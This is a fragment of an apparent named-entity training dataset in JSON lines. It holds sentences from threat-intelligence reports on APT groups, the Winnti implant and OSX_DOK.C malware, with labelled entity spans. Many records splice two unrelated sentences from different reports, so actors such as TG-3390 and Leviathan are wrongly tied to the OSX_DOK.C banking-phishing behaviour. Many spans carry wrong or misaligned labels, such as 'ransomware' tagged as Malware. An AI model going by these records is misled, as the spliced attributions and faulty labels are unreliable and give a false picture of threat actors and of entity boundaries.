"end": 180, "label": "Organization"}, {"start": 185, "end": 212, "label": "Organization"}, {"start": 250, "end": 257, "label": "System"}]} {"text": "The certificates Blackfly stole were also from South Korean companies , primarily in the video game and software development industry . Dropbox has already taken down the links .", "spans": [{"start": 60, "end": 69, "label": "Organization"}, {"start": 89, "end": 133, "label": "Organization"}, {"start": 136, "end": 143, "label": "System"}]} {"text": "Suckfly 's attacks on government organizations that provide information technology services to other government branches is not limited to India . 
The malware will install two proxies running on local host port 5555 and 5588 .", "spans": [{"start": 22, "end": 46, "label": "Organization"}, {"start": 60, "end": 91, "label": "Organization"}, {"start": 101, "end": 111, "label": "Organization"}, {"start": 176, "end": 183, "label": "System"}]} {"text": "In this report we continue our research of the actor 's operations with a specific focus on a selection of custom information technology ( IT ) tools and tactics the threat actor leveraged during the early stages of the targeted attack lifecycle . All of the traffic will be hijacked into the first proxy ( port 5555 ) with the victim \u2019s external IP address as parameter .", "spans": [{"start": 114, "end": 136, "label": "Organization"}, {"start": 139, "end": 141, "label": "Organization"}]} {"text": "CTU researchers have evidence that the TG-3390 compromised U.S and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations . The first ( port 5555 ) proxy first finds the IP parameter .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 39, "end": 46, "label": "Organization"}, {"start": 113, "end": 126, "label": "Organization"}, {"start": 142, "end": 151, "label": "Organization"}, {"start": 164, "end": 183, "label": "Organization"}, {"start": 188, "end": 198, "label": "Organization"}, {"start": 201, "end": 211, "label": "Organization"}, {"start": 214, "end": 220, "label": "Organization"}, {"start": 227, "end": 242, "label": "Organization"}, {"start": 247, "end": 256, "label": "Organization"}, {"start": 263, "end": 268, "label": "Organization"}]} {"text": "Based on analysis of the group 's SWCs , TG-3390 operations likely affect organizations in other countries and verticals . 
If it is not in Switzerland , the traffic will proceed as normal .", "spans": [{"start": 34, "end": 38, "label": "System"}, {"start": 41, "end": 48, "label": "Organization"}]} {"text": "TG-3390 operates a broad and long-running campaign of SWCs and has compromised approximately 100 websites as of this publication . If it detects an IP located in Switzerland , the malware will run an obfuscated JavaScript code and find its visiting domain .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 148, "end": 150, "label": "Indicator"}, {"start": 180, "end": 192, "label": "Malware"}]} {"text": "CTU researchers have evidence that the threat group compromised U.S and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations . If the domain is in the target , the malware will perform a MitM attack and redirect the traffic to the second proxy ( port 5588 ) , which routes the traffic to the Tor network .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 118, "end": 131, "label": "Organization"}, {"start": 147, "end": 156, "label": "Organization"}, {"start": 169, "end": 188, "label": "Organization"}, {"start": 193, "end": 203, "label": "Organization"}, {"start": 206, "end": 216, "label": "Organization"}, {"start": 219, "end": 225, "label": "Organization"}, {"start": 232, "end": 247, "label": "Organization"}, {"start": 252, "end": 261, "label": "Organization"}, {"start": 268, "end": 273, "label": "Organization"}]} {"text": "Based on this information , CTU researchers assess that TG-3390 aims to collect defense technology and capability intelligence , other industrial intelligence , and political intelligence from governments and NGOs . 
The purpose of these steps is to target users in Switzerland and hijack their traffic After deobfuscating the malware , we found the target domains :", "spans": [{"start": 28, "end": 31, "label": "Organization"}, {"start": 56, "end": 63, "label": "Organization"}, {"start": 165, "end": 187, "label": "Organization"}, {"start": 193, "end": 213, "label": "Organization"}]} {"text": "In 2016 , the threat actors conducted a strategic web compromise ( SWC ) on the website of an international industry organization that affected aerospace , academic , media , technology , government , and utilities organizations around the world . The target domain \u2019s visitors will be redirected into an e-banking login page that looks and acts normally , but is located on dark web sites .", "spans": [{"start": 67, "end": 70, "label": "System"}, {"start": 94, "end": 129, "label": "Organization"}, {"start": 144, "end": 153, "label": "Organization"}, {"start": 156, "end": 164, "label": "Organization"}, {"start": 167, "end": 172, "label": "Organization"}, {"start": 175, "end": 185, "label": "Organization"}, {"start": 188, "end": 198, "label": "Organization"}, {"start": 205, "end": 228, "label": "Organization"}]} {"text": "In addition , BRONZE UNION activity on multiple U.S.-based defense manufacturer networks included the threat actors seeking information associated with aerospace technologies , combat processes , and naval defense systems . However , once the victim enters an account and password .", "spans": [{"start": 48, "end": 66, "label": "Organization"}, {"start": 152, "end": 174, "label": "Organization"}, {"start": 177, "end": 193, "label": "Organization"}, {"start": 200, "end": 221, "label": "Organization"}]} {"text": "Leafminer attempts to infiltrate target networks through various means of intrusion : watering hole websites , vulnerability scans of network services on the internet , and brute-force login attempts . 
A window will pop out .", "spans": [{"start": 0, "end": 9, "label": "Organization"}]} {"text": "Leafminer also utilized Process Doppelganging , a detection evasion technique first discussed at the Black Hat EU conference last year . The pop-out window is just smoke and mirrors , where nothing actually happens once the countdown timer reaches zero .", "spans": [{"start": 0, "end": 9, "label": "Organization"}]} {"text": "On September 15 and 19 , 2017 , Proofpoint detected and blocked spearphishing emails from this group targeting a US shipbuilding company and a US university research center with military ties . We analyzed the webpage and found attackers injecting a script into the webpage .", "spans": [{"start": 32, "end": 42, "label": "Organization"}, {"start": 95, "end": 100, "label": "Organization"}, {"start": 116, "end": 136, "label": "Organization"}, {"start": 178, "end": 186, "label": "Organization"}]} {"text": "Between August 2 and 4 , the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors . Once the user enters an account and password , it will initiate POST using AJAX .", "spans": [{"start": 29, "end": 34, "label": "Organization"}, {"start": 129, "end": 148, "label": "Organization"}]} {"text": "Between August 2 and 4 , the Leviathan sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors . The POST message is sent to the same site as the fake login page\u2014which an attacker can control inside the Tor network .", "spans": [{"start": 29, "end": 38, "label": "Organization"}, {"start": 133, "end": 152, "label": "Organization"}]} {"text": "The Leviathan generally emailed Microsoft Excel documents with malicious macros to US universities with military interests , most frequently related to the Navy . 
We decoded the data section and found not only the account and password , but that it also fingerprinted the user \u2019s browser and system information .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 86, "end": 98, "label": "Organization"}, {"start": 104, "end": 112, "label": "Organization"}, {"start": 156, "end": 160, "label": "Organization"}]} {"text": "Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack . While Operation Emmental was able to bypass two-way authentication by tricking its victims into installing a fake app , we have not observed OSX_DOK.C doing this .", "spans": [{"start": 14, "end": 33, "label": "Organization"}, {"start": 60, "end": 79, "label": "Vulnerability"}, {"start": 247, "end": 255, "label": "System"}, {"start": 279, "end": 288, "label": "Malware"}]} {"text": "On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs . However , since they can inject code into the webpage , it means they have the ability to do this as well .", "spans": [{"start": 24, "end": 37, "label": "Organization"}, {"start": 72, "end": 82, "label": "Organization"}]} {"text": "On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs . 
We performed static analysis on the sample and found it packed by Ultimate Packer for Executables ( UPX ) , an open source executable packer that can often be abused by malware .", "spans": [{"start": 24, "end": 37, "label": "Organization"}, {"start": 72, "end": 82, "label": "Organization"}, {"start": 193, "end": 208, "label": "System"}, {"start": 213, "end": 224, "label": "System"}, {"start": 296, "end": 303, "label": "Malware"}]} {"text": "The Magic Hound attacks did not rely on exploit code to compromise targeted systems , instead relying on Excel and Word documents containing malicious macros . We successfully unpacked the initial sample we found dropped by the UPX unpacker .", "spans": [{"start": 228, "end": 240, "label": "System"}]} {"text": "The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method , specifically attempting to load MagicHound.Rollover . The malware is not obfuscated so we easily found interesting strings here .", "spans": [{"start": 138, "end": 157, "label": "System"}, {"start": 164, "end": 171, "label": "Malware"}]} {"text": "During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . We can see that the malware relies on bash shell for most of its setup .", "spans": [{"start": 27, "end": 32, "label": "Organization"}, {"start": 74, "end": 99, "label": "Malware"}, {"start": 162, "end": 169, "label": "Malware"}]} {"text": "APT33 often conducts spear-phishing operations using a built-in phishing module . We were not able to unpack the sample discovered after June 9 , 2017 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]} {"text": "In a recent attack , APT33 sent spear-phishing emails to workers in the aviation industry . 
The UPX gave a warning message about memory buffer overflow .", "spans": [{"start": 21, "end": 26, "label": "Organization"}, {"start": 72, "end": 89, "label": "Organization"}, {"start": 96, "end": 99, "label": "System"}]} {"text": "These emails included recruitment-themed lures and links to malicious HTML application ( HTA ) files . The malware author seemingly made unpacking the malware more difficult to slow down or even evade the antivirus engine \u2019s scanning process .", "spans": [{"start": 70, "end": 86, "label": "System"}, {"start": 89, "end": 92, "label": "Malware"}, {"start": 107, "end": 114, "label": "Malware"}]} {"text": "APT34 often uses compromised accounts to conduct spear-phishing operations . The packer is the same but the malware tries to exploit the undiscovered bug in the UPX library that causes unpack failure .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 17, "end": 37, "label": "System"}, {"start": 161, "end": 164, "label": "System"}]} {"text": "APT33 leverages a mix of public and non-public tools and often conducts spear-phishing operations using a built-in phishing module from \" ALFA TEaM Shell \" , a publicly available web shell . 
We have reported the issues to the UPX team , and they have already fixed it .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 25, "end": 52, "label": "System"}, {"start": 138, "end": 153, "label": "System"}, {"start": 160, "end": 188, "label": "System"}, {"start": 226, "end": 229, "label": "System"}]} {"text": "The impacted versions of the UPX library are 3.94 , 3.93 , and 3.92 .", "spans": [{"start": 29, "end": 32, "label": "System"}]} {"text": "This technique enables the malware to efficiently run while evading unpacking techniques from the AntiVirus-integrated UPX library .", "spans": []} {"text": "As mentioned earlier , we believe that OSX_DOK.C might be the MAC OS X version of WERDLOD , an online banking malware that used the same techniques as Operation Emmental .", "spans": [{"start": 39, "end": 48, "label": "Malware"}, {"start": 62, "end": 65, "label": "System"}, {"start": 82, "end": 89, "label": "Malware"}, {"start": 110, "end": 117, "label": "Malware"}, {"start": 151, "end": 169, "label": "System"}]} {"text": "Other research have also connected the OSX malware and Retefe ( the external term used for WERDLOD ) via similarities in their behavior .", "spans": [{"start": 39, "end": 42, "label": "System"}, {"start": 91, "end": 98, "label": "Malware"}]} {"text": "While OSX_DOK.C is designed for MAC S-OS OS X , which is a Unix-like system , WERDLOD is designed for Windows .", "spans": [{"start": 6, "end": 15, "label": "Malware"}, {"start": 32, "end": 45, "label": "System"}, {"start": 78, "end": 85, "label": "Malware"}, {"start": 102, "end": 109, "label": "System"}]} {"text": "But in terms of features and behaviors , these two malware are very similar .", "spans": []} {"text": "Here is a list of their similarities .", "spans": []} {"text": "Both malware kill all current browsers before installing fake certificates :", "spans": []} {"text": "Both WERDLOD and OSX_DOK.C are designed to kill the browser process before installing fake 
certificates .", "spans": [{"start": 5, "end": 12, "label": "Malware"}, {"start": 17, "end": 26, "label": "Malware"}]} {"text": "While WERDLOD kills processes for Internet Explorer , Firefox , and Chrome , OSX_DOK.C does the same on Safari , Firefox , and Chrome .", "spans": [{"start": 6, "end": 13, "label": "Malware"}, {"start": 34, "end": 51, "label": "System"}, {"start": 54, "end": 61, "label": "System"}, {"start": 68, "end": 74, "label": "System"}, {"start": 77, "end": 86, "label": "Malware"}, {"start": 104, "end": 110, "label": "System"}, {"start": 113, "end": 120, "label": "System"}, {"start": 127, "end": 133, "label": "System"}]} {"text": "Both malware share the same proxy settings and script :", "spans": [{"start": 5, "end": 12, "label": "Malware"}]} {"text": "While WERDLOD and OSX_DOK.C use different codes ( since they target different operating systems ) , they have similar proxy settings and script formats .", "spans": [{"start": 6, "end": 13, "label": "Malware"}, {"start": 18, "end": 27, "label": "Malware"}]} {"text": "In particular , WERDLOD uses scripts running on http://127.0.0.1:5555/#{random_string}.js?ip=#{my_ip} as proxy :", "spans": [{"start": 16, "end": 23, "label": "Malware"}, {"start": 48, "end": 101, "label": "Indicator"}]} {"text": "Comparing it to OSX_DOK.C , we can see that it uses the same script format .", "spans": [{"start": 16, "end": 25, "label": "Malware"}]} {"text": "Both malware have similar targets .", "spans": [{"start": 5, "end": 12, "label": "Malware"}]} {"text": "Both WERDLOD and OSX_DOK.C targeted financial institutions , with a particular focus on banks in Switzerland .", "spans": [{"start": 5, "end": 12, "label": "Malware"}, {"start": 17, "end": 26, "label": "Malware"}]} {"text": "Further analysis of both malware revealed that their main targets are very similar , as seen in the screenshot below .", "spans": [{"start": 25, "end": 32, "label": "Malware"}]} {"text": "While it \u2019s possible that this is a coincidence , the 
rest of the evidence makes it unlikely for these two malware to target the same organizations by chance .", "spans": [{"start": 107, "end": 114, "label": "Malware"}]} {"text": "Given the connection between WERDLOD and OSX_DOK.C , it is reasonable to assume that the latter is also a part of the Operational Emmental campaign .", "spans": [{"start": 29, "end": 36, "label": "Malware"}, {"start": 41, "end": 50, "label": "Malware"}]} {"text": "To further illustrate , here is a timeline of Operation Emmental and its potential relationship to OSX_DOK.C :", "spans": [{"start": 99, "end": 108, "label": "Malware"}]} {"text": "Despite phishing incidents for Mac devices being rarer than their Windows counterparts , users should still be aware that attackers can target them at any moment .", "spans": [{"start": 31, "end": 34, "label": "System"}, {"start": 66, "end": 73, "label": "System"}]} {"text": "By implementing best practices for phishing-type attacks\u2014such as refraining from downloading files unless they are absolutely certain that they come from trustworthy sources\u2014users can avoid being victimized by malware such as OSX_DOK.C that prey on users who lack awareness of phishing strategies .", "spans": [{"start": 226, "end": 235, "label": "Malware"}]} {"text": "In addition , end users can also benefit from security solutions such as Trend Micro Home Security for Mac , which provides comprehensive security and multi-device protection against viruses , ransomware , malicious websites , and identity thieves .", "spans": [{"start": 73, "end": 98, "label": "Organization"}, {"start": 103, "end": 106, "label": "System"}, {"start": 183, "end": 190, "label": "Malware"}, {"start": 193, "end": 203, "label": "Malware"}, {"start": 206, "end": 224, "label": "Malware"}, {"start": 231, "end": 247, "label": "Malware"}]} {"text": "It also provides secure storage of passwords and other sensitive information .", "spans": [{"start": 0, "end": 2, "label": "Organization"}]} {"text": "Trend 
Micro\u2122 Mobile Security for Apple devices ( available on the App Store ) can monitor and block phishing attacks and other malicious URLs .", "spans": [{"start": 0, "end": 28, "label": "Organization"}, {"start": 33, "end": 46, "label": "System"}, {"start": 66, "end": 75, "label": "System"}, {"start": 137, "end": 141, "label": "Indicator"}]} {"text": "For enterprises , Trend Micro \u2019s Smart Protection Suites with XGen\u2122 security , which support Mac systems , infuse high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across any user activity and any endpoint .", "spans": [{"start": 18, "end": 56, "label": "Organization"}, {"start": 62, "end": 76, "label": "Organization"}, {"start": 93, "end": 96, "label": "System"}]} {"text": "Detecting threat actors in recent German industrial attacks with Windows Defender ATP .", "spans": [{"start": 65, "end": 85, "label": "System"}]} {"text": "When a Germany-based industrial conglomerate disclosed in December 2016 that it was breached early that year , the breach was revealed to be a professionally run industrial espionage attack .", "spans": [{"start": 21, "end": 44, "label": "Organization"}]} {"text": "According to the German press , the intruders used the Winnti family of malware as their main implant , giving them persistent access to the conglomerate \u2019s network as early as February 2016 .", "spans": [{"start": 55, "end": 61, "label": "Malware"}]} {"text": "In this blog , we look at the Winnti malware implant as used by two known activity groups BARIUM and LEAD .", "spans": [{"start": 30, "end": 36, "label": "Malware"}, {"start": 90, "end": 96, "label": "Organization"}, {"start": 101, "end": 105, "label": "Organization"}]} {"text": "We look at how these activity groups introduce the implant to various targets and techniques used by Microsoft researchers to track the implant .", "spans": [{"start": 101, "end": 110, "label": "Organization"}]} {"text": "To show 
how this breach and similar breaches can be mitigated , we look at how Windows Defender Advanced Threat Protection ( Windows Defender ATP ) flags activities associated with BARIUM , LEAD , and other known activity groups and how it provides extensive threat intelligence about these groups .", "spans": [{"start": 79, "end": 122, "label": "System"}, {"start": 125, "end": 145, "label": "System"}, {"start": 181, "end": 187, "label": "Organization"}, {"start": 190, "end": 194, "label": "Organization"}]} {"text": "We go through the Winnti implant installation process and explore how Windows Defender ATP can capture such attacker methods and tools and provide visualized contextual information that can aid in actual attack investigation and response .", "spans": [{"start": 18, "end": 24, "label": "Malware"}, {"start": 70, "end": 90, "label": "System"}]} {"text": "We then discuss how centralized response options , provided as enhancements to Windows Defender ATP with the Windows 10 Creators Update , can be used to quickly stop threats , including stopping command and control ( C&C ) communication and preventing existing implants from installing additional components or from moving laterally to other computers on the network .", "spans": [{"start": 20, "end": 48, "label": "System"}, {"start": 79, "end": 99, "label": "System"}, {"start": 105, "end": 135, "label": "System"}, {"start": 217, "end": 220, "label": "Indicator"}]} {"text": "Microsoft Threat Intelligence associates Winnti with multiple activity groups\u2014collections of malware , supporting infrastructure , online personas , victimology , and other attack artifacts that the Microsoft intelligent security graph uses to categorize and attribute threat activity .", "spans": [{"start": 0, "end": 29, "label": "Organization"}, {"start": 41, "end": 47, "label": "Malware"}, {"start": 199, "end": 235, "label": "Organization"}]} {"text": "Microsoft labels activity groups using code names derived from elements in the periodic 
table .", "spans": [{"start": 0, "end": 9, "label": "Organization"}]} {"text": "In the case of this malware , the activity groups strongly associated with Winnti are BARIUM and LEAD .", "spans": [{"start": 75, "end": 81, "label": "Malware"}, {"start": 86, "end": 92, "label": "Organization"}, {"start": 97, "end": 101, "label": "Organization"}]} {"text": "But even though they share the use of Winnti , the BARIUM and LEAD activity groups are involved in very different intrusion scenarios .", "spans": [{"start": 38, "end": 44, "label": "Malware"}, {"start": 51, "end": 57, "label": "Organization"}, {"start": 62, "end": 66, "label": "Organization"}]} {"text": "BARIUM begins its attacks by cultivating relationships with potential victims\u2014particularly those working in Business Development or Human Resources\u2014on various social media platforms .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 159, "end": 181, "label": "System"}]} {"text": "Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads , compiled HTML help ( .chm ) files , or Microsoft Office documents containing macros or exploits .", "spans": [{"start": 5, "end": 11, "label": "Organization"}, {"start": 142, "end": 160, "label": "System"}, {"start": 163, "end": 167, "label": "Indicator"}, {"start": 199, "end": 212, "label": "System"}, {"start": 220, "end": 224, "label": "Indicator"}, {"start": 238, "end": 264, "label": "System"}]} {"text": "Initial intrusion stages feature the Win32/Barlaiy implant\u2014notable for its use of social network profiles , collaborative document editing sites , and blogs for C&C .", "spans": [{"start": 37, "end": 50, "label": "Malware"}, {"start": 82, "end": 105, "label": "System"}, {"start": 108, "end": 144, "label": "System"}, {"start": 151, "end": 156, "label": "System"}, {"start": 161, "end": 164, "label": 
"Indicator"}]} {"text": "Later stages of the intrusions rely upon Winnti for persistent access .", "spans": [{"start": 41, "end": 47, "label": "Malware"}]} {"text": "The majority of victims recorded to date have been in electronic gaming , multimedia , and Internet content industries , although occasional intrusions against technology companies have occurred .", "spans": [{"start": 160, "end": 180, "label": "Organization"}]} {"text": "In contrast , LEAD has established a far greater reputation for industrial espionage .", "spans": [{"start": 14, "end": 18, "label": "Organization"}]} {"text": "In the past few years , LEAD \u2019s victims have included :", "spans": [{"start": 24, "end": 28, "label": "Organization"}]} {"text": "Multinational , multi-industry companies involved in the manufacture of textiles , chemicals , and electronics .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 16, "end": 80, "label": "Organization"}, {"start": 83, "end": 92, "label": "Organization"}, {"start": 99, "end": 110, "label": "Organization"}]} {"text": "Pharmaceutical companies .", "spans": [{"start": 0, "end": 24, "label": "Organization"}]} {"text": "A company in the chemical industry .", "spans": [{"start": 0, "end": 34, "label": "Organization"}]} {"text": "University faculty specializing in aeronautical engineering and research .", "spans": []} {"text": "A company involved in the design and manufacture of motor vehicles .", "spans": [{"start": 0, "end": 66, "label": "Organization"}]} {"text": "A cybersecurity company focusing on protecting industrial control systems .", "spans": [{"start": 0, "end": 73, "label": "Organization"}]} {"text": "During these intrusions , LEAD \u2019s objective was to steal sensitive data , including research materials , process documents , and project plans .", "spans": [{"start": 26, "end": 30, "label": "Organization"}]} {"text": "LEAD also steals code-signing certificates to sign its malware in subsequent attacks .", "spans": 
[{"start": 0, "end": 4, "label": "Organization"}]} {"text": "In most cases , LEAD \u2019s attacks do not feature any advanced exploit techniques .", "spans": [{"start": 16, "end": 20, "label": "Organization"}]} {"text": "The group also does not make special effort to cultivate victims prior to an attack .", "spans": []} {"text": "Instead , the group often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware .", "spans": [{"start": 33, "end": 39, "label": "System"}, {"start": 42, "end": 58, "label": "System"}]} {"text": "In some other cases , LEAD gains access to a target by brute-forcing remote access login credentials , performing SQL injection , or exploiting unpatched web servers , and then they copy the Winnti installer directly to compromised machines .", "spans": [{"start": 22, "end": 26, "label": "Organization"}, {"start": 69, "end": 100, "label": "System"}, {"start": 114, "end": 127, "label": "System"}, {"start": 154, "end": 165, "label": "System"}, {"start": 191, "end": 197, "label": "Malware"}]} {"text": "Microsoft Analytics shows that Winnti has been used in intrusions carried out throughout Asia , Europe , Oceania , the Middle East , and the United States in the last six months .", "spans": [{"start": 0, "end": 19, "label": "Organization"}, {"start": 31, "end": 37, "label": "Malware"}]} {"text": "The most recent series of attacks observed was in December 2016 .", "spans": []} {"text": "Although tracking threats like Winnti involves old-fashioned investigative work , Microsoft Threat Intelligence analysts take advantage of machine learning to work at scale .", "spans": [{"start": 31, "end": 37, "label": "Malware"}, {"start": 139, "end": 155, "label": "System"}]} {"text": "When attackers used Winnti to maintain access to web servers , they hid the implant in plain sight by masquerading it as a trusted , legitimate file .", "spans": [{"start": 20, "end": 26, 
"label": "Malware"}]} {"text": "This was the case in two known intrusions in 2015 , where attackers named the implant DLL \u201c ASPNET_FILTER.DLL \u201d to disguise it as the DLL for the ASP.NET ISAPI Filter .", "spans": [{"start": 86, "end": 89, "label": "System"}, {"start": 92, "end": 109, "label": "Indicator"}, {"start": 134, "end": 137, "label": "System"}, {"start": 146, "end": 153, "label": "Indicator"}]} {"text": "Although there are obvious differences between the legitimate file and the malicious one , filtering out the malicious file would involve going through a data set with noise from millions of possible file names , software publishers , and certificates .", "spans": []} {"text": "Microsoft researchers used a combination of anomaly detection and supervised machine learning to reduce the data set and separate meaningful , malware-related anomalies from benign data .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 44, "end": 61, "label": "System"}, {"start": 66, "end": 93, "label": "System"}]} {"text": "Windows Defender ATP helps network security professionals deal with intrusions from activity groups like LEAD and BARIUM in several ways .", "spans": [{"start": 0, "end": 20, "label": "System"}, {"start": 105, "end": 109, "label": "Organization"}, {"start": 114, "end": 120, "label": "Organization"}]} {"text": "The following examples were developed using a Winnti installer that was used in attacks in December 2016 .", "spans": [{"start": 46, "end": 52, "label": "Malware"}]} {"text": "Microsoft Threat Intelligence continually tracks activity groups such as LEAD and BARIUM and documents the tactics , techniques , and procedures they employ in their attacks , with a special focus on the tools and infrastructure they use to facilitate those attacks .", "spans": [{"start": 0, "end": 29, "label": "Organization"}, {"start": 73, "end": 77, "label": "Organization"}, {"start": 82, "end": 88, "label": "Organization"}]} {"text": "Windows 
Defender ATP continuously monitors protected systems for such indicators of hostile activity and alerts security operations center ( SOC ) personnel to their presence .", "spans": [{"start": 0, "end": 20, "label": "System"}, {"start": 112, "end": 138, "label": "System"}, {"start": 141, "end": 144, "label": "System"}]} {"text": "To provide context around such alerts , Windows Defender ATP also features a short summary of the group \u2019s history , goals , methods , and tools , with links to extensive documentation for technically minded users .", "spans": [{"start": 40, "end": 60, "label": "System"}]} {"text": "Windows Defender ATP is also capable of detecting previously unknown attacks by monitoring system behavior indicative of hostile activity , including :", "spans": [{"start": 0, "end": 20, "label": "System"}]} {"text": "Malware installation , persistence , and activation .", "spans": []} {"text": "Backdoor command and control .", "spans": []} {"text": "Credential theft .", "spans": []} {"text": "Lateral movement to other machines on the network .", "spans": []} {"text": "For example , numerous malware families register themselves as services during installation to guarantee persistence across reboots .", "spans": []} {"text": "A majority of malware that perform this persistence technique modify the necessary registry keys in ways that do not fit the profile of a legitimate program .", "spans": []} {"text": "Winnti is no exception , and so , during Winnti \u2019s installation process , Windows Defender ATP is able to raise behavioral alerts .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 41, "end": 47, "label": "Malware"}, {"start": 74, "end": 94, "label": "System"}]} {"text": "To improve coverage while minimizing false positives , Windows Defender ATP uses the intelligent security graph to differentiate between suspicious and benign behavior before generating alerts .", "spans": [{"start": 55, "end": 75, "label": "System"}]} {"text": "It 
considers the age of the file , its global prevalence , and the presence and validity of a digital signature along with the method of service creation .", "spans": []} {"text": "For alerts raised either by specific threat intelligence tied to activity groups or by more generic suspicious behaviors , Windows Defender ATP provides rich , visualized technical context .", "spans": [{"start": 123, "end": 143, "label": "System"}]} {"text": "This visual context enables SOC personnel to investigate alerts with all related artifacts , understand the scope of the breach , and prepare a comprehensive action plan .", "spans": []} {"text": "In the screenshots below , Windows Defender ATP clearly presents the Winnti installation where an installer drops a DLL to disk , loads the DLL using rundll32 , sets the DLL as a service , and saves a copy of itself in C:\\Windows\\Help .", "spans": [{"start": 27, "end": 47, "label": "System"}, {"start": 116, "end": 119, "label": "System"}, {"start": 140, "end": 143, "label": "System"}, {"start": 170, "end": 173, "label": "System"}]} {"text": "Windows Defender ATP displays these activities as process trees in a machine timeline for the infected computer .", "spans": [{"start": 0, "end": 20, "label": "System"}]} {"text": "Analysts can easily extract detailed information from these trees , such as the implant DLL dropped by the installer , the command used to call rundll32.exe and load the DLL , and the registry modifications that set the DLL as a service .", "spans": [{"start": 88, "end": 91, "label": "System"}, {"start": 144, "end": 156, "label": "Indicator"}, {"start": 170, "end": 173, "label": "System"}, {"start": 220, "end": 223, "label": "System"}]} {"text": "This information can provide an initial means by which to assess the scope of the breach .", "spans": []} {"text": "The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a 
detected threat .", "spans": [{"start": 0, "end": 30, "label": "System"}, {"start": 66, "end": 86, "label": "System"}]} {"text": "If an intruder compromises a computer that has been onboarded to Windows Defender ATP , SOC personnel can isolate the computer from the network , blocking command and control of the implant and preventing attackers from installing additional malware and moving laterally to other computers in the network .", "spans": [{"start": 65, "end": 85, "label": "System"}]} {"text": "Meanwhile , connectivity to the Windows Defender ATP service is maintained .", "spans": [{"start": 32, "end": 39, "label": "System"}]} {"text": "While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions .", "spans": [{"start": 131, "end": 134, "label": "Indicator"}]} {"text": "Another option is to simply halt and quarantine the Winnti implant itself , stopping the intrusion on a single machine .", "spans": [{"start": 52, "end": 66, "label": "Malware"}]} {"text": "LEAD and BARIUM are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 9, "end": 15, "label": "Organization"}]} {"text": "Nevertheless , Windows Defender ATP also supports blocking the implant across the entire enterprise , stopping large-scale intrusions in the early stages .", "spans": [{"start": 15, "end": 35, "label": "System"}]} {"text": "With the enhanced post-breach detection capabilities of Windows Defender ATP , SOC personnel are able to reduce this period to hours or even minutes , significantly lessening the potential impact of persistent attacker access to their network .", "spans": [{"start": 
9, "end": 52, "label": "System"}, {"start": 56, "end": 76, "label": "System"}]} {"text": "Windows Defender ATP provides extensive information about activity groups responsible for the attacks , enabling customers to understand aspects of the attack that may not be obtained by network and endpoint sensors , such as common social engineering lures and the regional nature of an attack .", "spans": [{"start": 0, "end": 20, "label": "System"}]} {"text": "With relevant visualized information , analysts are able to study malware behavior on impacted machines , so they can investigate further and plan out their response .", "spans": [{"start": 5, "end": 36, "label": "System"}]} {"text": "Detecting threat actors in recent German industrial attacks with Windows Defender ATP .", "spans": [{"start": 65, "end": 85, "label": "System"}]} {"text": "Detecting threat actors in recent German industrial attacks with Windows Defender ATP .", "spans": [{"start": 65, "end": 85, "label": "System"}]} {"text": "Downeks and Quasar RAT Used in Recent Targeted Attacks Against Governments .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 12, "end": 22, "label": "Malware"}]} {"text": "Palo Alto Networks Traps Advanced Endpoint Protection recently prevented recent attacks that we believe are part of a campaign linked to DustySky .", "spans": [{"start": 0, "end": 53, "label": "Organization"}]} {"text": "DustySky is a campaign which others have attributed to the Gaza Cybergang group , a group that targets government interests in the region .", "spans": [{"start": 59, "end": 79, "label": "Organization"}]} {"text": "This report shares our researchers \u2019 analysis of the attack and Remote Access Tool ( RAT ) .", "spans": [{"start": 64, "end": 82, "label": "System"}]} {"text": "We also discovered during our research that the RAT Server used by this attacker is itself vulnerable to remote attack , a double-edged sword for these attackers .", "spans": [{"start": 48, "end": 51, 
